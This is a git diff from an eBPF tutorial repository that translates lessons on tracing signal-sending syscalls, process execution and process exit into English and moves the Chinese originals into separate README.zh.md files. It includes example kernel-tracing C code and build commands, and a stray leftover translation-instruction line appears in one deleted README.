Using a hash map requires defining a struct: ```c struct { @@ -135,8 +135,6 @@ struct { } values SEC(".maps"); ``` -并使用一些对应的 API 进行访问,例如 bpf_map_lookup_elem、bpf_map_update_elem、bpf_map_delete_elem 等。 +And using corresponding APIs for access, such as bpf_map_lookup_elem, bpf_map_update_elem, bpf_map_delete_elem, etc. -更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: - -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/6-sigsnoop/README.zh.md b/src/6-sigsnoop/README.zh.md new file mode 100755 index 0000000..2a8715b --- /dev/null +++ b/src/6-sigsnoop/README.zh.md @@ -0,0 +1,142 @@ +# eBPF 入门开发实践教程六:捕获进程发送信号的系统调用集合,使用 hash map 保存状态 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第六篇,主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。 + +## sigsnoop + +示例代码如下: + +```c +#include +#include +#include + +#define MAX_ENTRIES 10240 +#define TASK_COMM_LEN 16 + +struct event { + unsigned int pid; + unsigned int tpid; + int sig; + int ret; + char comm[TASK_COMM_LEN]; +}; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, __u32); + __type(value, struct event); +} values SEC(".maps"); + + +static int probe_entry(pid_t tpid, int sig) +{ + struct event event = {}; + __u64 pid_tgid; + __u32 tid; + + pid_tgid = bpf_get_current_pid_tgid(); + tid = (__u32)pid_tgid; + event.pid = pid_tgid >> 32; + event.tpid = tpid; + event.sig = sig; + bpf_get_current_comm(event.comm, sizeof(event.comm)); + bpf_map_update_elem(&values, &tid, &event, BPF_ANY); + return 0; +} + +static int probe_exit(void *ctx, int ret) +{ + __u64 pid_tgid = bpf_get_current_pid_tgid(); + __u32 tid = (__u32)pid_tgid; + struct event *eventp; + + eventp = bpf_map_lookup_elem(&values, &tid); + if (!eventp) + return 0; + + eventp->ret = ret; + bpf_printk("PID %d (%s) sent signal %d ", + eventp->pid, eventp->comm, eventp->sig); + bpf_printk("to PID %d, ret = %d", + eventp->tpid, ret); + +cleanup: + bpf_map_delete_elem(&values, &tid); + return 0; +} + +SEC("tracepoint/syscalls/sys_enter_kill") +int kill_entry(struct trace_event_raw_sys_enter *ctx) +{ + pid_t tpid = (pid_t)ctx->args[0]; + int sig = (int)ctx->args[1]; + + return probe_entry(tpid, sig); +} + +SEC("tracepoint/syscalls/sys_exit_kill") +int kill_exit(struct trace_event_raw_sys_exit *ctx) +{ + return probe_exit(ctx, ctx->ret); +} + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; +``` + +上面的代码定义了一个 eBPF 程序,用于捕获进程发送信号的系统调用,包括 kill、tkill 和 tgkill。它通过使用 tracepoint 来捕获系统调用的进入和退出事件,并在这些事件发生时执行指定的探针函数,例如 probe_entry 和 probe_exit。 + +在探针函数中,我们使用 bpf_map 存储捕获的事件信息,包括发送信号的进程 ID、接收信号的进程 ID、信号值和进程的可执行文件名称。在系统调用退出时,我们将获取存储在 bpf_map 中的事件信息,并使用 bpf_printk 打印进程 ID、进程名称、发送的信号和系统调用的返回值。 + +最后,我们还需要使用 SEC 宏来定义探针,并指定要捕获的系统调用的名称,以及要执行的探针函数。 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +编译运行上述代码: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或者 + +```console +$ ecc sigsnoop.bpf.c +Compiling bpf object... +Generating export types... +Packing ebpf object and config into package.json... +$ sudo ecli run package.json +Runing eBPF program... 
+``` + +运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 + systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0 + systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 + systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3 +``` + +## 总结 + +本文主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。使用 hash map 需要定义一个结构体: + +```c +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, __u32); + __type(value, struct event); +} values SEC(".maps"); +``` + +并使用一些对应的 API 进行访问,例如 bpf_map_lookup_elem、bpf_map_update_elem、bpf_map_delete_elem 等。 + +更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/6-sigsnoop/README_en.md b/src/6-sigsnoop/README_en.md deleted file mode 100755 index 7af9ca5..0000000 --- a/src/6-sigsnoop/README_en.md +++ /dev/null @@ -1,140 +0,0 @@ -# eBPF Tutorial by Example 6: Capturing Signal Sending and Store State with Hash Maps - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. - -This article is the sixth part of the eBPF Tutorial by Example. It mainly introduces how to implement an eBPF tool that captures a collection of system calls that send signals to processes and uses a hash map to store state. - -## sigsnoop - -The example code is as follows: - -```c -#include -#include -#include - -#define MAX_ENTRIES 10240 -#define TASK_COMM_LEN 16 - -struct event { - unsigned int pid; - unsigned int tpid; - int sig; - int ret; - char comm[TASK_COMM_LEN]; -}; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, __u32); - __type(value, struct event); -} values SEC(".maps"); - - -static int probe_entry(pid_t tpid, int sig) -{ - struct event event = {}; - __u64 pid_tgid; - __u32 tid; - - pid_tgid = bpf_get_current_pid_tgid(); - tid = (__u32)pid_tgid; - event.pid = pid_tgid >> 32; - event.tpid = tpid; - event.sig = sig; - bpf_get_current_comm(event.comm, sizeof(event.comm)); - bpf_map_update_elem(&values, &tid, &event, BPF_ANY); - return 0; -} - -static int probe_exit(void *ctx, int ret) -{ - __u64 pid_tgid = bpf_get_current_pid_tgid(); - __u32 tid = (__u32)pid_tgid; - struct event *eventp; - - eventp = bpf_map_lookup_elem(&values, &tid); - if (!eventp) - return 0; - - eventp->ret = ret; - bpf_printk("PID %d (%s) sent signal %d ", - eventp->pid, eventp->comm, eventp->sig); - bpf_printk("to PID %d, ret = %d", - eventp->tpid, ret); - -cleanup: - bpf_map_delete_elem(&values, &tid); - return 0; -} - -SEC("tracepoint/syscalls/sys_enter_kill") -int kill_entry(struct trace_event_raw_sys_enter *ctx) -{ - pid_t tpid = (pid_t)ctx->args[0]; - int sig = (int)ctx->args[1]; - - return probe_entry(tpid, sig); -} - -SEC("tracepoint/syscalls/sys_exit_kill") -int kill_exit(struct trace_event_raw_sys_exit *ctx) -{ - return probe_exit(ctx, ctx->ret); -} - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; -``` - -The above code defines an eBPF program for capturing system calls that send signals to processes, including kill, tkill, and tgkill. 
It captures the enter and exit events of system calls by using tracepoints, and executes specified probe functions such as `probe_entry` and `probe_exit` when these events occur. - -In the probe function, we use the bpf_map to store the captured event information, including the process ID of the sending signal, the process ID of the receiving signal, the signal value, and the name of the executable for the current task. When the system call exits, we retrieve the event information stored in the bpf_map and use bpf_printk to print the process ID, process name, sent signal, and return value of the system call. - -Finally, we also need to use the SEC macro to define the probe and specify the name of the system call to be captured and the probe function to be executed. - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its purpose is to simplify the development, building, distribution, and running of eBPF programs. You can refer to for downloading and installing the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. - -Compile and run the above code: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -or - -```console -$ ecc sigsnoop.bpf.c -Compiling bpf object... -Generating export types... -Packing ebpf object and config into package.json... -$ sudo ecli run package.json -Running eBPF program... -``` - -After running this program, you can view the output of the eBPF program by checking the /sys/kernel/debug/tracing/trace_pipe file: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 - systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0 - systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 - systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3 -``` - -## Summary - -This article mainly introduces how to implement an eBPF tool to capture the collection of system calls sent by processes using signals and save the state using a hash map. Using a hash map requires defining a struct: - -```c -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, __u32); - __type(value, struct event); -} values SEC(".maps"); -``` - -And using corresponding APIs for access, such as bpf_map_lookup_elem, bpf_map_update_elem, bpf_map_delete_elem, etc. - -If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/7-execsnoop/README.md b/src/7-execsnoop/README.md index 6625c7a..24fda3d 100644 --- a/src/7-execsnoop/README.md +++ b/src/7-execsnoop/README.md @@ -1,18 +1,18 @@ -# eBPF 入门实践教程七:捕获进程执行事件,通过 perf event array 向用户态打印输出 +# eBPF Tutorial by Example 7: Capturing Process Execution, Output with perf event array -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. 
-本文是 eBPF 入门开发实践教程的第七篇,主要介绍如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,不需要再通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出。通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。 +This article is the seventh part of the eBPF Tutorial by Example and mainly introduces how to capture process execution events in the Linux kernel and print output to the user command line via a perf event array. This eliminates the need to view the output of eBPF programs by checking the `/sys/kernel/debug/tracing/trace_pipe` file. After sending information to user space via the perf event array, complex data processing and analysis can be performed. ## perf buffer -eBPF 提供了两个环形缓冲区,可以用来将信息从 eBPF 程序传输到用户区控制器。第一个是perf环形缓冲区,,它至少从内核v4.15开始就存在了。第二个是后来引入的 BPF 环形缓冲区。本文只考虑perf环形缓冲区。 +eBPF provides two circular buffers for transferring information from eBPF programs to user space controllers. The first one is the perf circular buffer, which has existed since at least kernel v4.15. The second one is the BPF circular buffer introduced later. This article only considers the perf circular buffer. ## execsnoop -通过 perf event array 向用户态命令行打印输出,需要编写一个头文件,一个 C 源文件。示例代码如下: +To print output to the user command line via the perf event array, a header file and a C source file need to be written. The example code is as follows: -头文件:execsnoop.h +Header file: execsnoop.h ```c #ifndef __EXECSNOOP_H @@ -32,7 +32,7 @@ struct event { #endif /* __EXECSNOOP_H */ ``` -源文件:execsnoop.bpf.c +Source file: execsnoop.bpf.c ```c // SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) @@ -48,7 +48,7 @@ struct { } events SEC(".maps"); SEC("tracepoint/syscalls/sys_enter_execve") -int tracepoint__syscalls__sys_enter_execve(struct trace_event_raw_sys_enter* ctx) +int tracepoint_syscalls_sys_enter_execve(struct trace_event_raw_sys_enter* ctx) { u64 id; pid_t pid, tgid; @@ -72,27 +72,27 @@ int tracepoint__syscalls__sys_enter_execve(struct trace_event_raw_sys_enter* ctx char LICENSE[] SEC("license") = "GPL"; ``` -这段代码定义了个 eBPF 程序,用于捕获进程执行 execve 系统调用的入口。 +This code defines an eBPF program for capturing the entry of the `execve` system call. -在入口程序中,我们首先获取了当前进程的进程 ID 和用户 ID,然后通过 bpf_get_current_task 函数获取了当前进程的 task_struct 结构体,并通过 bpf_probe_read_str 函数读取了进程名称。最后,我们通过 bpf_perf_event_output 函数将进程执行事件输出到 perf buffer。 +In the entry program, we first obtain the process ID and user ID of the current process, then use the `bpf_get_current_task` function to obtain the `task_struct` structure of the current process, and use the `bpf_probe_read_str` function to read the process name. Finally, we use the `bpf_perf_event_output` function to output the process execution event to the perf buffer. -使用这段代码,我们就可以捕获 Linux 内核中进程执行的事件, 并分析进程的执行情况。 +With this code, we can capture process execution events in the Linux kernel and analyze the process execution conditions. -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +We use eunomia-bpf to compile and execute this example. You can refer to the following link to download and install the ecc compilation toolchain and ecli runtime: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf).
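+If you are curious what eunomia-bpf automates on the user-space side, the sketch below shows what a hand-written libbpf consumer of the `events` perf event array might look like. It is illustrative only: the skeleton header `execsnoop.skel.h` and the `execsnoop_bpf__*` functions are assumptions (a `bpftool gen skeleton` output), not part of this tutorial's eunomia-bpf build.
+
+```c
+// Hypothetical libbpf loader: polls the "events" perf event array and
+// prints each struct event defined in execsnoop.h. Assumes a bpftool
+// skeleton; eunomia-bpf generates equivalent plumbing automatically.
+#include <stdio.h>
+#include <bpf/libbpf.h>
+#include "execsnoop.h"
+#include "execsnoop.skel.h"
+
+static void handle_event(void *ctx, int cpu, void *data, __u32 size)
+{
+    const struct event *e = data;
+    printf("%-16s pid=%d ppid=%d uid=%d\n", e->comm, e->pid, e->ppid, e->uid);
+}
+
+int main(void)
+{
+    struct execsnoop_bpf *skel = execsnoop_bpf__open_and_load();
+    if (!skel)
+        return 1;
+    if (execsnoop_bpf__attach(skel))
+        goto cleanup;
+
+    /* 8 ring pages per CPU; handle_event runs once per submitted sample */
+    struct perf_buffer *pb = perf_buffer__new(bpf_map__fd(skel->maps.events),
+                                              8, handle_event, NULL, NULL, NULL);
+    if (pb)
+        while (perf_buffer__poll(pb, 100 /* ms */) >= 0)
+            ;
+    perf_buffer__free(pb);
+cleanup:
+    execsnoop_bpf__destroy(skel);
+    return 0;
+}
+```
+
+Note that `perf_buffer__new` takes a per-CPU page count because perfbuf allocates one ring per CPU; that per-CPU memory overhead is exactly what the ring buffer covered in the next part avoids.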
-使用容器编译: +Compile using a container: ```shell docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或者使用 ecc 编译: +Or compile using ecc: ```shell ecc execsnoop.bpf.c execsnoop.h ``` -运行 +Run: ```console $ sudo ./ecli run package.json @@ -106,9 +106,9 @@ TIME PID PPID UID COMM 21:28:30 40753 40752 1000 cpuUsage.sh ``` -## 总结 +## Summary -本文介绍了如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。在 libbpf 对应的内核态代码中,定义这样一个结构体和对应的头文件: +This article introduces how to capture events of processes running in the Linux kernel and print output to the user command-line using the perf event array. After sending information to the user space via the perf event array, complex data processing and analysis can be performed. In the corresponding kernel code of libbpf, a structure and corresponding header file can be defined as follows: ```c struct { @@ -118,8 +118,8 @@ struct { } events SEC(".maps"); ``` -就可以往用户态直接发送信息。 +This allows sending information directly to the user space. -更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: +For more examples and detailed development guide, please refer to the official documentation of eunomia-bpf: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) to get more examples and complete tutorials." diff --git a/src/7-execsnoop/README.zh.md b/src/7-execsnoop/README.zh.md new file mode 100644 index 0000000..6625c7a --- /dev/null +++ b/src/7-execsnoop/README.zh.md @@ -0,0 +1,125 @@ +# eBPF 入门实践教程七:捕获进程执行事件,通过 perf event array 向用户态打印输出 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第七篇,主要介绍如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,不需要再通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出。通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。 + +## perf buffer + +eBPF 提供了两个环形缓冲区,可以用来将信息从 eBPF 程序传输到用户区控制器。第一个是perf环形缓冲区,,它至少从内核v4.15开始就存在了。第二个是后来引入的 BPF 环形缓冲区。本文只考虑perf环形缓冲区。 + +## execsnoop + +通过 perf event array 向用户态命令行打印输出,需要编写一个头文件,一个 C 源文件。示例代码如下: + +头文件:execsnoop.h + +```c +#ifndef __EXECSNOOP_H +#define __EXECSNOOP_H + +#define TASK_COMM_LEN 16 + +struct event { + int pid; + int ppid; + int uid; + int retval; + bool is_exit; + char comm[TASK_COMM_LEN]; +}; + +#endif /* __EXECSNOOP_H */ +``` + +源文件:execsnoop.bpf.c + +```c +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +#include +#include +#include +#include "execsnoop.h" + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __uint(key_size, sizeof(u32)); + __uint(value_size, sizeof(u32)); +} events SEC(".maps"); + +SEC("tracepoint/syscalls/sys_enter_execve") +int tracepoint__syscalls__sys_enter_execve(struct trace_event_raw_sys_enter* ctx) +{ + u64 id; + pid_t pid, tgid; + struct event event={0}; + struct task_struct *task; + + uid_t uid = (u32)bpf_get_current_uid_gid(); + id = bpf_get_current_pid_tgid(); + tgid = id >> 32; + + event.pid = tgid; + event.uid = uid; + task = (struct task_struct*)bpf_get_current_task(); + event.ppid = BPF_CORE_READ(task, real_parent, tgid); + char *cmd_ptr = (char *) BPF_CORE_READ(ctx, args[0]); + bpf_probe_read_str(&event.comm, sizeof(event.comm), cmd_ptr); + bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, 
sizeof(event)); + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +这段代码定义了个 eBPF 程序,用于捕获进程执行 execve 系统调用的入口。 + +在入口程序中,我们首先获取了当前进程的进程 ID 和用户 ID,然后通过 bpf_get_current_task 函数获取了当前进程的 task_struct 结构体,并通过 bpf_probe_read_str 函数读取了进程名称。最后,我们通过 bpf_perf_event_output 函数将进程执行事件输出到 perf buffer。 + +使用这段代码,我们就可以捕获 Linux 内核中进程执行的事件, 并分析进程的执行情况。 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +使用容器编译: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或者使用 ecc 编译: + +```shell +ecc execsnoop.bpf.c execsnoop.h +``` + +运行 + +```console +$ sudo ./ecli run package.json +TIME PID PPID UID COMM +21:28:30 40747 3517 1000 node +21:28:30 40748 40747 1000 sh +21:28:30 40749 3517 1000 node +21:28:30 40750 40749 1000 sh +21:28:30 40751 3517 1000 node +21:28:30 40752 40751 1000 sh +21:28:30 40753 40752 1000 cpuUsage.sh +``` + +## 总结 + +本文介绍了如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。在 libbpf 对应的内核态代码中,定义这样一个结构体和对应的头文件: + +```c +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __uint(key_size, sizeof(u32)); + __uint(value_size, sizeof(u32)); +} events SEC(".maps"); +``` + +就可以往用户态直接发送信息。 + +更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/7-execsnoop/README_en.md b/src/7-execsnoop/README_en.md deleted file mode 100644 index 24fda3d..0000000 --- a/src/7-execsnoop/README_en.md +++ /dev/null @@ -1,125 +0,0 @@ -# eBPF Tutorial by Example 7: Capturing Process Execution, Output with perf event array - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. - -This article is the seventh part of the eBPF Tutorial by Example and mainly introduces how to capture process execution events in the Linux kernel and print output to the user command line via a perf event array. This eliminates the need to view the output of eBPF programs by checking the `/sys/kernel/debug/tracing/trace_pipe` file. After sending information to user space via the perf event array, complex data processing and analysis can be performed. - -## perf buffer - -eBPF provides two circular buffers for transferring information from eBPF programs to user space controllers. The first one is the perf circular buffer, which has existed since at least kernel v4.15. The second one is the BPF circular buffer introduced later. This article only considers the perf circular buffer. - -## execsnoop - -To print output to the user command line via the perf event array, a header file and a C source file need to be written. 
The example code is as follows: - -Header file: execsnoop.h - -```c -#ifndef __EXECSNOOP_H -#define __EXECSNOOP_H - -#define TASK_COMM_LEN 16 - -struct event { - int pid; - int ppid; - int uid; - int retval; - bool is_exit; - char comm[TASK_COMM_LEN]; -}; - -#endif /* __EXECSNOOP_H */ -``` - -Source file: execsnoop.bpf.c - -```c -// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) -#include -#include -#include -#include "execsnoop.h" - -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); - __uint(key_size, sizeof(u32)); - __uint(value_size, sizeof(u32)); -} events SEC(".maps"); - -SEC("tracepoint/syscalls/sys_enter_execve") -int tracepoint_syscalls_sys_enter_execve(struct trace_event_raw_sys_enter* ctx) -{ - u64 id; - pid_t pid, tgid; - struct event event={0}; - struct task_struct *task; - - uid_t uid = (u32)bpf_get_current_uid_gid(); - id = bpf_get_current_pid_tgid(); - tgid = id >> 32; - - event.pid = tgid; - event.uid = uid; - task = (struct task_struct*)bpf_get_current_task(); - event.ppid = BPF_CORE_READ(task, real_parent, tgid); - char *cmd_ptr = (char *) BPF_CORE_READ(ctx, args[0]); - bpf_probe_read_str(&event.comm, sizeof(event.comm), cmd_ptr); - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event)); - return 0; -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -This code defines an eBPF program for capturing the entry of the `execve` system call. - -In the entry program, we first obtain the process ID and user ID of the current process, then use the `bpf_get_current_task` function to obtain the `task_struct` structure of the current process, and use the `bpf_probe_read_str` function to read the process name. Finally, we use the `bpf_perf_event_output` function to output the process execution event to the perf buffer. - -With this code, we can capture process execution events in the Linux kernel and analyze the process execution conditions.Instructions: Translate the following Chinese text to English while maintaining the original formatting: - -We use eunomia-bpf to compile and execute this example. You can refer to the following link to download and install the ecc compilation toolchain and ecli runtime: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). - -Compile using a container: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Or compile using ecc: - -```shell -ecc execsnoop.bpf.c execsnoop.h -``` - -Run: - -```console -$ sudo ./ecli run package.json -TIME PID PPID UID COMM -21:28:30 40747 3517 1000 node -21:28:30 40748 40747 1000 sh -21:28:30 40749 3517 1000 node -21:28:30 40750 40749 1000 sh -21:28:30 40751 3517 1000 node -21:28:30 40752 40751 1000 sh -21:28:30 40753 40752 1000 cpuUsage.sh -``` - -## Summary - -This article introduces how to capture events of processes running in the Linux kernel and print output to the user command-line using the perf event array. After sending information to the user space via the perf event array, complex data processing and analysis can be performed. In the corresponding kernel code of libbpf, a structure and corresponding header file can be defined as follows: - -```c -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); - __uint(key_size, sizeof(u32)); - __uint(value_size, sizeof(u32)); -} events SEC(".maps"); -``` - -This allows sending information directly to the user space. 
- -For more examples and detailed development guide, please refer to the official documentation of eunomia-bpf: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). - -If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) to get more examples and complete tutorials." diff --git a/src/8-exitsnoop/README.md b/src/8-exitsnoop/README.md index fbb30a8..9983cbe 100644 --- a/src/8-exitsnoop/README.md +++ b/src/8-exitsnoop/README.md @@ -1,38 +1,38 @@ -# eBPF 入门开发实践教程八:在 eBPF 中使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出 +# eBPF Tutorial by Example 8: Monitoring Process Exit Events, Output with Ring Buffer -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel. -本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件。 +This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF. -## ring buffer +## Ring Buffer -现在有一个新的 BPF 数据结构可用,eBPF 环形缓冲区(ring buffer)。它解决了 BPF perf buffer(当今从内核向用户空间发送数据的事实上的标准)的内存效率和事件重排问题,同时达到或超过了它的性能。它既提供了与 perf buffer 兼容以方便迁移,又有新的保留/提交API,具有更好的可用性。另外,合成和真实世界的基准测试表明,在几乎所有的情况下,所以考虑将其作为从BPF程序向用户空间发送数据的默认选择。 +There is now a new BPF data structure available called the eBPF ring buffer. It solves the memory efficiency and event reordering issues of the BPF perf buffer, which is currently the de facto standard for sending data from the kernel to user space. It provides compatibility with perf buffer for easy migration while also introducing new reserved/commit APIs for improved usability. Additionally, synthetic and real-world benchmark tests have shown that in nearly all cases, the eBPF ring buffer should be the default choice for sending data from BPF programs to user space. -### eBPF ringbuf vs eBPF perfbuf +### eBPF Ring Buffer vs eBPF Perf Buffer -只要 BPF 程序需要将收集到的数据发送到用户空间进行后处理和记录,它通常会使用 BPF perf buffer(perfbuf)来实现。Perfbuf 是每个CPU循环缓冲区的集合,它允许在内核和用户空间之间有效地交换数据。它在实践中效果很好,但由于其按CPU设计,它有两个主要的缺点,在实践中被证明是不方便的:内存的低效使用和事件的重新排序。 +Whenever a BPF program needs to send collected data to user space for post-processing and logging, it typically uses the BPF perf buffer (perfbuf). Perfbuf is a collection of per-CPU circular buffers that allow efficient data exchange between the kernel and user space. It works well in practice, but it has two main drawbacks that have proven to be inconvenient: inefficient memory usage and event reordering. -为了解决这些问题,从Linux 5.8开始,BPF提供了一个新的BPF数据结构(BPF map)。BPF环形缓冲区(ringbuf)。它是一个多生产者、单消费者(MPSC)队列,可以同时在多个CPU上安全共享。 +To address these issues, starting from Linux 5.8, BPF introduces a new BPF data structure called BPF ring buffer. It is a multiple producer, single consumer (MPSC) queue that can be safely shared across multiple CPUs. -BPF ringbuf 支持来自 BPF perfbuf 的熟悉的功能: +The BPF ring buffer supports familiar features from BPF perf buffer: -- 变长的数据记录。 -- 能够通过内存映射区域有效地从用户空间读取数据,而不需要额外的内存拷贝和/或进入内核的系统调用。 -- 既支持epoll通知,又能以绝对最小的延迟进行忙环操作。 +- Variable-length data records. +- Efficient reading of data from user space through memory-mapped regions without additional memory copies and/or entering kernel system calls. 
+- Support for epoll notifications and busy loop operations with absolute minimal latency. -同时,BPF ringbuf解决了BPF perfbuf的以下问题: +At the same time, the BPF ring buffer solves the following problems of the BPF perf buffer: -- 内存开销。 -- 数据排序。 -- 浪费的工作和额外的数据复制。 +- Memory overhead. +- Data ordering. +- Unnecessary work and additional data copying. ## exitsnoop -本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件,并使用 ring buffer 向用户态打印输出。 +This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF and using the ring buffer to print output to user space. -使用 ring buffer 向用户态打印输出的步骤和 perf buffer 类似,首先需要定义一个头文件: +The steps for printing output to user space using the ring buffer are similar to perf buffer. First, a header file needs to be defined: -头文件:exitsnoop.h +Header File: exitsnoop.h ```c #ifndef __BOOTSTRAP_H @@ -52,7 +52,7 @@ struct event { #endif /* __BOOTSTRAP_H */ ``` -源文件:exitsnoop.bpf.c +Source File: exitsnoop.bpf.c ```c #include "vmlinux.h" @@ -106,23 +106,23 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) } ``` -这段代码展示了如何使用 exitsnoop 监控进程退出事件并使用 ring buffer 向用户态打印输出: +This code 